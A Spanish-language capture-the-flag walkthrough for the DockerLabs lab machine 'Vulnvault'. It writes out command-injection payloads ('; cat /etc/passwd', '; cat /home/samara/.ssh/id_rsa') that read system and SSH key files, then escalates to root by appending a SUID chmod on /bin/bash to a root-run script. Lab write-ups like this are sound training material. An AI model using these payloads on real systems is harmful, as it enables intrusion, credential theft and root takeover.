Máquina: Vulnvault
SO: Linux
Nivel: Facil
DockerLabs


1. Descubriendo puertos abiertos de la maquina objetivo.

sudo nmap -p- -sS --open -T5 --min-rate=5000 -n -Pn -sCV 172.17.0.2

img

2. Revisamos la web, tenemos un formulario para generar reportes y otra para subir archivos; haciendo fuzzing podemos encontrar unos cuantos mas pero nada que ver, sin vectores de entrada.

http://172.17.0.2

img

3. El nombre tanto como la fecha ingresada en el formulario se refleja por debajo al generar el reporte; ingresamos un comando y vemos que tenemos ejecucion remota de comandos.

; id

img img

4. Leemos el passwd para ver los usuarios del sistema, encontramos el usuario samara.

; cat /etc/passwd

img

5. Ya sabiendo el usuario leemos su idrsa, nos copiamos toda la clave.

; cat /home/samara/.ssh/id_rsa

img

6. Lo guardamos en un fichero, le damos los permisos al idrsa y nos conectamos por ssh.

nano id_rsa

chmod 600 id_rsa

ssh -i id_rsa samara@172.17.0.2

img

7. No tenemos binarios SUID, encuentro unos ficheros pero sin mas.

cat message.txt

cat user.txt

img

8. Vemos los procesos y nos encontramos que root ejecuta un script que crea el fichero message.txt; revisamos los permisos de echo.sh, podemos escribir en el fichero; hacemos que root convierta la bash en binario SUID; por ultimo ejecutamos la bash manteniendo los privilegios de root.

ps -aux

cat /usr/local/bin/echo.sh

ls -l !$

echo "chmod u+s /bin/bash" > !$

bash -p

img


Finalizado.